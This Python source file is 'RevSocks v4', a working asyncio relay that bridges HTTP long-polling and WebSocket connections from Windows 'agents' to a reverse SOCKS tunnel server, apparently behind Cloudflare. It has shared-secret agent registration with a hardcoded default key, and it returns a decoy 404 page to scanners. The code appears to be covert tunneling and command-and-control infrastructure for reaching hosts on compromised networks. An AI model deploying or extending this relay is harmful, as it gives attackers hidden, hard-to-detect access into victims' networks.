#!/usr/bin/env python3
"""
RevSocks v4 — Cloudflare HTTP/WebSocket to TCP Bridge

Full asyncio implementation (no threading). Accepts:
  1. HTTP POST/GET polling (/tunnel/<session_id>) — Win2003+ agents
  2. WebSocket upgrade (/ws) — Win7+ agents

Forwards all traffic to the main SOCKS tunnel server on localhost:443.

Configuration via environment:
  CF_BRIDGE_PORT       — Listen port (default: 4443)
  CF_BRIDGE_BACKEND    — Backend server (default: 127.0.0.1:443)
  CF_BRIDGE_SECRET     — Shared secret (default: reads config.txt)
  CF_BRIDGE_TIMEOUT    — Session idle timeout in seconds (default: 120)

Usage:
  python3 cf_bridge.py
  CF_BRIDGE_PORT=8443 python3 cf_bridge.py
"""

import asyncio
import hashlib
import base64
import struct
import os
import time
import logging
import signal

# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------

LISTEN_PORT = int(os.environ.get("CF_BRIDGE_PORT", "4443"))
BACKEND_HOST = os.environ.get("CF_BRIDGE_BACKEND", "127.0.0.1:443")
SESSION_TIMEOUT = int(os.environ.get("CF_BRIDGE_TIMEOUT", "120"))
CLEANUP_INTERVAL = 60
MAX_BODY_SIZE = 2 * 1024 * 1024  # 2MB max POST body
MAX_HEADER_SIZE = 16384

# Shared secret — from env, config file, or default
SHARED_SECRET = os.environ.get("CF_BRIDGE_SECRET", "").encode() or None

if not SHARED_SECRET:
    config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "config.txt")
    if os.path.exists(config_path):
        with open(config_path) as f:
            for line in f:
                line = line.strip()
                if line.startswith("shared_secret"):
                    SHARED_SECRET = line.split("=", 1)[1].strip().encode()
                    break
    if not SHARED_SECRET:
        SHARED_SECRET = b"f191074b103901bb58a4ca37494e4cf6"

_bhost, _bport = BACKEND_HOST.rsplit(":", 1)
SOCKS_SERVER = (_bhost, int(_bport))

# ---------------------------------------------------------------------------
# Logging
# ---------------------------------------------------------------------------

logging.basicConfig(
    level=logging.INFO,
    format="[%(asctime)s] %(levelname)s %(message)s",
    datefmt="%H:%M:%S"
)
log = logging.getLogger("cf_bridge")

# ---------------------------------------------------------------------------
# Session management
# ---------------------------------------------------------------------------

class Session:
    """Represents one HTTP tunnel session (one agent connection)."""

    __slots__ = (
        "session_id", "tcp_reader", "tcp_writer",
        "send_queue", "connected", "auth_complete",
        "last_activity", "_reader_task"
    )

    def __init__(self, session_id: str):
        self.session_id = session_id
        self.tcp_reader: asyncio.StreamReader | None = None
        self.tcp_writer: asyncio.StreamWriter | None = None
        self.send_queue: asyncio.Queue = asyncio.Queue(maxsize=512)
        self.connected = False
        self.auth_complete = False
        self.last_activity = time.monotonic()
        self._reader_task: asyncio.Task | None = None

    async def close(self):
        self.connected = False
        if self._reader_task and not self._reader_task.done():
            self._reader_task.cancel()
        if self.tcp_writer:
            try:
                self.tcp_writer.close()
                await self.tcp_writer.wait_closed()
            except Exception:
                pass

    def touch(self):
        self.last_activity = time.monotonic()


sessions: dict[str, Session] = {}


# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------

async def readexactly(reader: asyncio.StreamReader, n: int) -> bytes | None:
    """Read exactly n bytes; return None on EOF."""
    data = b""
    while len(data) < n:
        chunk = await reader.read(n - len(data))
        if not chunk:
            return None
        data += chunk
    return data


def verify_auth(session_id_bytes: bytes, auth_hash: bytes) -> bool:
    """Verify agent registration proof: SHA256('REG:' + session_id + secret)."""
    auth_msg = b"REG:" + session_id_bytes + SHARED_SECRET
    expected = hashlib.sha256(auth_msg).digest()
    # Constant-time comparison
    if len(auth_hash) != len(expected):
        return False
    result = 0
    for a, b in zip(auth_hash, expected):
        result |= a ^ b
    return result == 0


def build_http_response(status: int, body: bytes, extra_headers: str = "") -> bytes:
    """Build a raw HTTP/1.1 response."""
    status_text = {
        200: "OK", 204: "No Content", 400: "Bad Request",
        403: "Forbidden", 404: "Not Found", 405: "Method Not Allowed",
        502: "Bad Gateway", 503: "Service Unavailable"
    }
    resp = f"HTTP/1.1 {status} {status_text.get(status, 'Error')}\r\n"
    resp += f"Content-Length: {len(body)}\r\n"
    resp += "Content-Type: application/octet-stream\r\n"
    resp += "Connection: close\r\n"
    resp += "X-Content-Type-Options: nosniff\r\n"
    if extra_headers:
        resp += extra_headers
    resp += "\r\n"
    return resp.encode() + body


# ---------------------------------------------------------------------------
# Backend reader task (runs per-session)
# ---------------------------------------------------------------------------

async def backend_reader_task(session: Session):
    """
    Read data from the SOCKS server TCP socket and queue it for the agent.

    Auth phase:
      1. Server sends 32-byte challenge -> queue for agent
      2. (Agent sends 32-byte response and "CC20" via POST -> forwarded directly)
      3. Server sends 4-byte CC20 confirmation -> queue for agent

    Framed phase:
      Each message: [len:4][payload] -> queue as-is for agent
    """
    try:
        # --- Auth phase ---
        challenge = await readexactly(session.tcp_reader, 32)
        if not challenge:
            log.warning(f"[{session.session_id[:8]}] Backend closed before challenge")
            session.connected = False
            return
        await session.send_queue.put(challenge)
        log.debug(f"[{session.session_id[:8]}] Queued 32-byte challenge")

        # Wait for CC20 confirmation from server
        cc20_resp = await readexactly(session.tcp_reader, 4)
        if not cc20_resp:
            log.warning(f"[{session.session_id[:8]}] Backend closed before CC20 confirm")
            session.connected = False
            return
        await session.send_queue.put(cc20_resp)
        log.debug(f"[{session.session_id[:8]}] Queued CC20 response: {cc20_resp}")

        session.auth_complete = True
        log.info(f"[{session.session_id[:8]}] Auth complete, entering framed mode")

        # --- Framed phase ---
        while session.connected:
            raw_len = await readexactly(session.tcp_reader, 4)
            if not raw_len:
                break
            msg_len = int.from_bytes(raw_len, "big")
            if msg_len == 0 or msg_len > MAX_BODY_SIZE:
                log.warning(f"[{session.session_id[:8]}] Invalid frame length: {msg_len}")
                break
            payload = await readexactly(session.tcp_reader, msg_len)
            if not payload:
                break
            # Queue length-prefixed frame for agent
            await session.send_queue.put(raw_len + payload)

    except asyncio.CancelledError:
        pass
    except Exception as e:
        log.debug(f"[{session.session_id[:8]}] Reader exception: {e}")
    finally:
        session.connected = False
        log.info(f"[{session.session_id[:8]}] Backend reader stopped")


# ---------------------------------------------------------------------------
# HTTP tunnel handlers
# ---------------------------------------------------------------------------

async def handle_tunnel_post(writer: asyncio.StreamWriter, session_id: str, body: bytes):
    """Agent sends data to backend via POST."""

    # --- Registration ---
    if session_id not in sessions and len(body) == 64:
        sid_bytes = body[:32]
        auth_hash = body[32:64]

        if not verify_auth(sid_bytes, auth_hash):
            log.warning(f"Auth failed for session {session_id[:8]}")
            writer.write(build_http_response(403, b"Forbidden"))
            return

        session = Session(session_id)
        sessions[session_id] = session

        try:
            session.tcp_reader, session.tcp_writer = await asyncio.wait_for(
                asyncio.open_connection(*SOCKS_SERVER), timeout=10
            )
            session.connected = True
            session._reader_task = asyncio.create_task(backend_reader_task(session))
            log.info(f"[{session_id[:8]}] New session registered, connected to backend")
            writer.write(build_http_response(200, b"OK"))
        except Exception as e:
            log.error(f"[{session_id[:8]}] Backend connect failed: {e}")
            del sessions[session_id]
            writer.write(build_http_response(502, b"Backend Error"))
        return

    # --- Data forward ---
    session = sessions.get(session_id)
    if not session or not session.connected:
        writer.write(build_http_response(404, b"Session Not Found"))
        return

    session.touch()
    try:
        session.tcp_writer.write(body)
        await session.tcp_writer.drain()
        writer.write(build_http_response(200, b"OK"))
    except Exception:
        session.connected = False
        writer.write(build_http_response(502, b"Backend Error"))


async def handle_tunnel_get(writer: asyncio.StreamWriter, session_id: str):
    """Agent receives data from backend via GET (long-poll, 25s timeout)."""

    session = sessions.get(session_id)
    if not session or not session.connected:
        writer.write(build_http_response(404, b"Session Not Found"))
        return

    session.touch()
    try:
        data = await asyncio.wait_for(session.send_queue.get(), timeout=25)
        writer.write(build_http_response(200, data))
    except asyncio.TimeoutError:
        writer.write(build_http_response(204, b""))
    except Exception:
        writer.write(build_http_response(502, b"Error"))


# ---------------------------------------------------------------------------
# WebSocket handler
# ---------------------------------------------------------------------------

async def handle_websocket(reader: asyncio.StreamReader, writer: asyncio.StreamWriter,
                           headers: dict):
    """Bidirectional WebSocket relay to backend."""

    key = headers.get("sec-websocket-key", "")
    if not key:
        writer.write(build_http_response(400, b"Bad Request"))
        return

    magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
    accept = base64.b64encode(hashlib.sha1((key + magic).encode()).digest()).decode()

    upgrade_resp = (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {accept}\r\n\r\n"
    )
    writer.write(upgrade_resp.encode())
    await writer.drain()

    try:
        tcp_reader, tcp_writer = await asyncio.wait_for(
            asyncio.open_connection(*SOCKS_SERVER), timeout=10
        )
    except Exception:
        writer.close()
        return

    async def ws_to_tcp():
        try:
            while True:
                header = await reader.readexactly(2)
                opcode = header[0] & 0x0F
                masked = bool(header[1] & 0x80)
                length = header[1] & 0x7F

                if length == 126:
                    length = struct.unpack(">H", await reader.readexactly(2))[0]
                elif length == 127:
                    length = struct.unpack(">Q", await reader.readexactly(8))[0]

                mask_key = await reader.readexactly(4) if masked else None
                data = await reader.readexactly(length)

                if mask_key:
                    data = bytearray(data)
                    for i in range(len(data)):
                        data[i] ^= mask_key[i % 4]
                    data = bytes(data)

                if opcode == 0x08:  # Close
                    break

                tcp_writer.write(data)
                await tcp_writer.drain()
        except Exception:
            pass

    async def tcp_to_ws():
        try:
            while True:
                data = await tcp_reader.read(65536)
                if not data:
                    break
                frame = bytearray()
                frame.append(0x82)  # FIN + binary
                if len(data) < 126:
                    frame.append(len(data))
                elif len(data) < 65536:
                    frame.append(126)
                    frame.extend(struct.pack(">H", len(data)))
                else:
                    frame.append(127)
                    frame.extend(struct.pack(">Q", len(data)))
                frame.extend(data)
                writer.write(bytes(frame))
                await writer.drain()
        except Exception:
            pass

    t1 = asyncio.create_task(ws_to_tcp())
    t2 = asyncio.create_task(tcp_to_ws())
    done, pending = await asyncio.wait([t1, t2], return_when=asyncio.FIRST_COMPLETED)
    for t in pending:
        t.cancel()
    try:
        tcp_writer.close()
        await tcp_writer.wait_closed()
    except Exception:
        pass


# ---------------------------------------------------------------------------
# Main connection handler
# ---------------------------------------------------------------------------

async def handle_connection(reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
    """Parse HTTP request and route to appropriate handler."""

    peer = writer.get_extra_info("peername")
    try:
        # Read HTTP headers
        request = b""
        while b"\r\n\r\n" not in request:
            chunk = await asyncio.wait_for(reader.read(8192), timeout=30)
            if not chunk:
                return
            request += chunk
            if len(request) > MAX_HEADER_SIZE:
                writer.write(build_http_response(400, b"Headers Too Large"))
                return

        header_end = request.index(b"\r\n\r\n") + 4
        headers_raw = request[:header_end].decode("utf-8", errors="ignore")
        body_start = request[header_end:]

        lines = headers_raw.split("\r\n")
        parts = lines[0].split(" ", 2)
        if len(parts) < 3:
            writer.write(build_http_response(400, b"Bad Request"))
            return

        method, path = parts[0], parts[1]

        headers = {}
        for line in lines[1:]:
            if ":" in line:
                k, v = line.split(":", 1)
                headers[k.strip().lower()] = v.strip()

        # --- WebSocket upgrade ---
        if headers.get("upgrade", "").lower() == "websocket":
            await handle_websocket(reader, writer, headers)
            return

        # --- HTTP tunnel ---
        if path.startswith("/tunnel/"):
            path_parts = path.split("/")
            session_id = path_parts[2] if len(path_parts) > 2 else ""

            if not session_id or len(session_id) != 32:
                writer.write(build_http_response(400, b"Invalid Session"))
                return

            # Read full body for POST
            content_length = int(headers.get("content-length", "0"))
            if content_length > MAX_BODY_SIZE:
                writer.write(build_http_response(400, b"Body Too Large"))
                return

            body = body_start
            while len(body) < content_length:
                chunk = await asyncio.wait_for(
                    reader.read(min(content_length - len(body), 65536)),
                    timeout=30
                )
                if not chunk:
                    break
                body += chunk

            if method == "POST":
                await handle_tunnel_post(writer, session_id, body)
            elif method == "GET":
                await handle_tunnel_get(writer, session_id)
            else:
                writer.write(build_http_response(405, b"Method Not Allowed"))

        # --- Health check endpoint ---
        elif path == "/health":
            status = {
                "sessions": len(sessions),
                "active": sum(1 for s in sessions.values() if s.connected)
            }
            body = f'{{"sessions":{status["sessions"]},"active":{status["active"]}}}'.encode()
            writer.write(build_http_response(200, body))

        else:
            # Return a plausible 404 for scanners
            writer.write(build_http_response(404, b"<html><body><h1>404 Not Found</h1></body></html>"))

    except asyncio.TimeoutError:
        pass
    except Exception as e:
        log.debug(f"Connection handler error ({peer}): {e}")
    finally:
        try:
            await writer.drain()
            writer.close()
            await writer.wait_closed()
        except Exception:
            pass


# ---------------------------------------------------------------------------
# Stale session cleanup
# ---------------------------------------------------------------------------

async def cleanup_task():
    """Remove sessions that have been idle beyond SESSION_TIMEOUT."""
    while True:
        await asyncio.sleep(CLEANUP_INTERVAL)
        now = time.monotonic()
        stale = [
            sid for sid, s in sessions.items()
            if now - s.last_activity > SESSION_TIMEOUT or not s.connected
        ]
        for sid in stale:
            session = sessions.pop(sid, None)
            if session:
                log.info(f"[{sid[:8]}] Cleaning up stale session")
                await session.close()
        if stale:
            log.info(f"Cleaned {len(stale)} stale session(s), {len(sessions)} active")


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

async def main():
    server = await asyncio.start_server(
        handle_connection,
        "127.0.0.1",
        LISTEN_PORT,
        reuse_address=True
    )

    log.info(f"CF Bridge listening on 127.0.0.1:{LISTEN_PORT}")
    log.info(f"Backend: {SOCKS_SERVER[0]}:{SOCKS_SERVER[1]}")
    log.info(f"Session timeout: {SESSION_TIMEOUT}s")
    log.info("Supports: WebSocket (/ws) + HTTP polling (/tunnel/<session>)")

    asyncio.create_task(cleanup_task())

    # Graceful shutdown on SIGTERM/SIGINT
    loop = asyncio.get_running_loop()
    stop_event = asyncio.Event()

    def shutdown_handler():
        log.info("Shutting down...")
        stop_event.set()

    for sig in (signal.SIGTERM, signal.SIGINT):
        try:
            loop.add_signal_handler(sig, shutdown_handler)
        except NotImplementedError:
            pass  # Windows

    async with server:
        serve_task = asyncio.create_task(server.serve_forever())
        await stop_event.wait()
        serve_task.cancel()

    # Close all sessions
    for sid, session in list(sessions.items()):
        await session.close()
    sessions.clear()
    log.info("All sessions closed, exiting")


if __name__ == "__main__":
    log.info("RevSocks v4 — Cloudflare HTTP/WebSocket Bridge")
    try:
        import uvloop
        uvloop.install()
        log.info("Using uvloop")
    except ImportError:
        pass
    asyncio.run(main())
